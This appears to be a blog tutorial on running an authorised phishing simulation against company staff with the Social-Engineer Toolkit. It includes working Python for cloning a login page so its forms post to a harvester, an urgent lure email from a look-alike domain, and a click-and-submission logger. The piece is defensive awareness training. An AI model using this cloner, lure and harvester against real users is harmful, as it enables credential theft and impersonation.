My advice to any company looking to improve its security is to run a simulated social engineering attack on its staff before investing in anything else. In a study by the Ponemon Institute, 54% of security breaches were attributed to negligent actions by employees or contractors rather than to sophisticated technical attacks.
In this post, you will learn how to set up a simulated phishing attack to run against staff in your own organisation.
Phishing is the practice of fraudulently attempting to obtain sensitive information from a target by disguising messages as if they came from a trustworthy entity. Usually, the phisher tries to extract usernames, email addresses, passwords and credit card numbers by sending generic emails:
This phishing email looks like it could genuinely be from Apple and would fool many people into clicking the link to "verify their account", especially with the sense of urgency brought about with the line:
Failure to complete our validation process will result in a suspension of your Apple ID.
The most successful phishing emails create a sense of urgency to scare recipients into thinking something bad will happen if they do not take immediate action, rather than by trying to incentivise someone with something good that will happen if they do take immediate action. That is, people are broadly more trusting of emails to prevent bad things on their accounts and less trusting of good (especially free) things offered by the same means.
In case there was any doubt about the above email, the "verify" link certainly does not go to an Apple website, and anything entered into the fake form is delivered to the attacker. The attacker hopes to harvest the accounts of many victims, either to exploit them further or to sell the credentials on black markets.
Phishing On The Web
Although phishing attacks are usually delivered by email, it is worth knowing that any platform where links can be shared can be the source of a phishing attack, including:
- Social media websites
- Product Forums
- Review websites
- Chat applications like Slack, WhatsApp and Skype
- SMS messages
This knowledge is useful for a company when setting up their simulated phishing attack as they can choose multiple media platforms to distribute links to their staff.
Setting Up A Simulated Phishing Attack
There are two primary decisions to be made in order to run a simulated phishing attack:
- Which action to encourage users to take
- Which delivery media to use to distribute phishing messages
Most often, an organisation checks whether staff click a link in an email to a fraudulent login page and then proceed to enter their credentials.
As a separate test, many organisations also measure how many staff open an attachment from an email, simulating the delivery of malware such as ransomware.
Part 1: Cloning A Website
In this tutorial, we will clone the Twitter login page, but the same techniques can be used to clone nearly any website with a login page.
The tool of choice is TrustedSec's Social-Engineer Toolkit (SET), available on GitHub and installed by default on Kali Linux.
The website cloner tool can be reached by following the options when running the Toolkit:
- Social-Engineering Attacks
- Website Attack Vectors
- Credential Harvester Attack Method
- Site Cloner
The tool asks for the IP address of the machine that will serve the cloned page and receive the submitted form data (normally the machine running SET), and for the URL of the website to clone.
Entering the IP address of your local machine and the URL "https://twitter.com/login/" starts a web server on that address, serving the following page:
Notice the website is not being hosted on the twitter.com domain. Phishing attacks succeed anyway because the typical user rarely inspects the address bar. A sneaky attacker would register a look-alike domain such as "twtter.com", which resembles the real name but is definitely not Twitter, and host the page there. For a sanctioned simulation, register a look-alike domain that the organisation itself controls, so the campaign and its data stay in-house.
For a real attack across the internet, this page would be hosted on a system with a public IP address under that domain name. The attacker would also obtain a TLS certificate for the domain, which a certificate authority such as Let's Encrypt issues free of charge, so the browser shows the padlock. Most users read the padlock as "this site is safe", but all it actually means is that the connection is encrypted and the certificate matches the domain in the address bar; it says nothing about who owns that domain.
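What Site Cloner does to the fetched page, shown as an added example rather than SET's own code: take the HTML, point every form at the harvester, and let stylesheets and scripts keep loading from the real site so the clone renders identically. The sample page, the https://twitter.com/ origin and the http://10.0.0.5/login harvester address are constructed for the example; Twitter's real markup is not reproduced.

```python
"""Minimal site-cloner form rewriter (example added for this post; not the
Social-Engineer Toolkit's own code). Every <form> on the fetched page is
pointed at the harvester, and a <base> tag keeps relative CSS/JS/images
loading from the real site so the clone renders identically."""
from html import escape
from html.parser import HTMLParser


class FormRewriter(HTMLParser):
    """Re-emits the document unchanged except for <form> tags and one injected
    <base> tag. convert_charrefs=False keeps entities such as &amp; intact."""

    def __init__(self, origin, harvester_url):
        super().__init__(convert_charrefs=False)
        self.origin = origin                # e.g. "https://twitter.com/"
        self.harvester_url = harvester_url  # where credentials will be posted
        self.out = []
        self.forms_rewritten = 0

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            # Drop the original target and method, then force a POST to the harvester.
            kept = [(k, v) for k, v in attrs if k not in ("action", "method")]
            kept += [("action", self.harvester_url), ("method", "post")]
            rendered = "".join(
                f' {k}="{escape(v, quote=True)}"' if v is not None else f" {k}"
                for k, v in kept
            )
            self.out.append(f"<form{rendered}>")
            self.forms_rewritten += 1
            return
        self.out.append(self.get_starttag_text())
        if tag == "head":
            # Relative URLs in the clone must resolve against the real site.
            self.out.append(f'<base href="{escape(self.origin, quote=True)}">')

    def handle_startendtag(self, tag, attrs):
        self.out.append(self.get_starttag_text())

    def handle_endtag(self, tag):
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(data)

    def handle_entityref(self, name):
        self.out.append(f"&{name};")

    def handle_charref(self, name):
        self.out.append(f"&#{name};")

    def handle_comment(self, data):
        self.out.append(f"<!--{data}-->")

    def handle_decl(self, decl):
        self.out.append(f"<!{decl}>")


def clone_login_page(html, origin, harvester_url):
    """Return (rewritten_html, number_of_forms_rewritten)."""
    parser = FormRewriter(origin, harvester_url)
    parser.feed(html)
    parser.close()
    return "".join(parser.out), parser.forms_rewritten


# Constructed stand-in for a fetched login page (not Twitter's real markup).
SAMPLE_PAGE = """<!DOCTYPE html>
<html><head><title>Log in</title>
<link rel="stylesheet" href="/css/login.css"></head>
<body><!-- login box -->
<form action="/sessions" method="post" class="login">
<input name="session[username_or_email]">
<input name="session[password]" type="password">
<button>Log in &amp; continue</button></form></body></html>"""

if __name__ == "__main__":
    # In a real clone the HTML comes from urllib.request.urlopen(origin + "login").
    page, n = clone_login_page(SAMPLE_PAGE, "https://twitter.com/", "http://10.0.0.5/login")
    print(f"{n} form(s) rewritten")
    print(page)
```

The rewriter deliberately leaves everything except the form tags untouched: the less the clone differs from the original, the less there is for a careful user to notice. Note that the injected `<base>` means the victim's browser still fetches assets from the real site, so the real site's logs will show the referrer of the clone; for a simulation that is harmless, for a real attacker it is a tell.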
Part 2: Distributing Links
After the attacker has set up the fake website, all that is required is to share a link to the new website in a convincing manner.
Most phishing attackers send a generic email to a large number of email addresses, hoping at least some recipients fall for the trick. These emails contain no personal details and are usually easy to spot.
Alternatively, "spear phishing" is the practice of crafting the email message to specifically target segments of recipients to make it appear to be genuine. For example, the message would mention a specific project, company or interest of the target recipients groups in an increased effort to get a positive response.
Segmenting the recipients even further, "whaling" is the highly-targeted process of sending phishing emails only to senior staff and executives within an organisation. The process is the same, but the messages are highly-crafted to target specific members of an organisation that will usually have the authority and access to process sensitive requests.
When running a simulated attack on an organisation, spear phishing and whaling significantly improve the response rate, at the cost of more effort to research and write the messages.
Part 3: Capturing Data
When a user opens the link and submits the cloned form, the data is posted to the SET web server at the IP address entered during setup; SET records the fields and then redirects the user to the real site, so nothing looks amiss. The attacker therefore sees every username, password, credit card number and other value entered into any form:
The toolkit can also export a report:
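Parts 2 and 3 together, as an added example that is not SET's own code: a per-recipient tracking link, so the report can say who clicked rather than just how many, and a small WSGI harvester that logs the click, the submitted username and whether a password was typed, then redirects to the real site. The 10.0.0.5 address, the twtter.com sender, the campaign secret and the form field names are assumptions; the served login page and the request bodies are constructed inline so the whole thing runs offline.

```python
"""Tracking links and a harvester endpoint for a sanctioned in-house phishing
simulation. Example code added for this post, not SET's own harvester: it
records who clicked and who submitted, but never stores the password typed."""
import hashlib
import hmac
import io
import time
from email.message import EmailMessage
from urllib.parse import parse_qs, urlencode

CAMPAIGN_SECRET = b"rotate-me-per-campaign"   # assumption: generated per campaign
HARVESTER = "http://10.0.0.5/login"           # assumption: the IP entered into SET
REAL_LOGIN = "https://twitter.com/login"      # users are sent here after submitting
EVENTS = []                                   # in memory; a real run appends to a file

# Constructed stand-in for the cloned page served on GET (a real run serves the clone).
LOGIN_PAGE = """<!DOCTYPE html><html><body><form action="{action}" method="post">
<input name="session[username_or_email]"><input name="session[password]" type="password">
<button>Log in</button></form></body></html>"""


def recipient_token(recipient):
    """Per-recipient token: attributes a click without putting the address in
    the URL, and cannot be guessed or forged for another recipient."""
    return hmac.new(CAMPAIGN_SECRET, recipient.encode(), hashlib.sha256).hexdigest()[:16]


def tracking_link(recipient):
    return f"{HARVESTER}?{urlencode({'t': recipient_token(recipient)})}"


def build_email(recipient, sender="security@twtter.com"):
    """The lure with this recipient's own link; send it with smtplib.SMTP.send_message."""
    msg = EmailMessage()
    msg["From"], msg["To"] = sender, recipient
    msg["Subject"] = "Action required: verify your account"
    msg.set_content(
        "Unusual sign-in activity was detected. Failure to verify within 24 hours\n"
        f"will result in suspension of your account:\n\n{tracking_link(recipient)}\n"
    )
    return msg


def harvester_app(environ, start_response):
    """WSGI app behind HARVESTER. GET logs a click and serves the page; POST logs
    the submission (username only) and redirects to the real site."""
    token = parse_qs(environ.get("QUERY_STRING", "")).get("t", [""])[0]
    event = {"ts": int(time.time()), "token": token, "method": environ["REQUEST_METHOD"],
             "src": environ.get("REMOTE_ADDR", ""), "ua": environ.get("HTTP_USER_AGENT", "")}
    if environ["REQUEST_METHOD"] == "POST":
        length = int(environ.get("CONTENT_LENGTH") or 0)
        form = parse_qs(environ["wsgi.input"].read(length).decode())
        event["username"] = form.get("session[username_or_email]", [""])[0]
        # Record that a password was typed, never the password itself.
        event["password_entered"] = bool(form.get("session[password]", [""])[0])
        EVENTS.append(event)
        start_response("302 Found", [("Location", REAL_LOGIN)])
        return [b""]
    EVENTS.append(event)
    action = f"{HARVESTER}?{urlencode({'t': token})}"   # carry the token into the POST
    start_response("200 OK", [("Content-Type", "text/html; charset=utf-8")])
    return [LOGIN_PAGE.format(action=action).encode()]


def report(recipients):
    """Per-recipient outcome, which is what the simulation is run to learn."""
    by_token = {recipient_token(r): r for r in recipients}
    result = {r: {"clicked": False, "submitted": False} for r in recipients}
    for event in EVENTS:
        recipient = by_token.get(event["token"])
        if recipient is None:
            continue                  # unknown token: a link scanner or a tampered URL
        result[recipient]["clicked"] = True
        if event["method"] == "POST":
            result[recipient]["submitted"] = True
    return result


def simulate(method, token, body=b""):
    """Drive harvester_app with a hand-built WSGI environ, so this runs offline."""
    captured = {}

    def start_response(status, headers):
        captured["status"], captured["headers"] = status, dict(headers)

    environ = {"REQUEST_METHOD": method, "QUERY_STRING": urlencode({"t": token}),
               "CONTENT_LENGTH": str(len(body)), "REMOTE_ADDR": "10.0.0.23",
               "HTTP_USER_AGENT": "Mozilla/5.0 (constructed)", "wsgi.input": io.BytesIO(body)}
    chunks = harvester_app(environ, start_response)
    return captured["status"], captured["headers"], b"".join(chunks).decode()


if __name__ == "__main__":
    # Live: from wsgiref.simple_server import make_server; make_server("10.0.0.5", 80, harvester_app).serve_forever()
    alice, bob = "alice@example.com", "bob@example.com"
    print(build_email(alice))
    simulate("GET", recipient_token(alice))
    simulate("POST", recipient_token(alice), b"session[username_or_email]=alice&session[password]=hunter2")
    print(report([alice, bob]))   # alice clicked and submitted, bob did neither
```

Two design points. The token is an HMAC of the address rather than the address itself, so a recipient who forwards the link cannot read anyone else's identity out of it, and a curious one cannot mint a valid token for a colleague. Clicks with an unknown token are kept in the log but left out of the report; corporate mail gateways follow links to scan them, and counting those as staff clicks inflates the result.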
Setting up a simulated phishing attack is rather simple: install and run the Social-Engineer Toolkit on a virtual machine and configure the domain name records. The hard parts are distributing the links at scale, automating the process and getting the messages past the organisation's own mail filters (for an internal simulation, agreeing an allow-list for the sending domain with the mail administrators beats trying to evade them). Two things to settle before sending anything: written authorisation from whoever owns the risk, and a rule that the harvester records who submitted the form but not what they typed, because the toolkit writes every captured field, passwords included, to a plaintext log.
However, when running a simulation like this in your organisation, you may just be surprised by the results.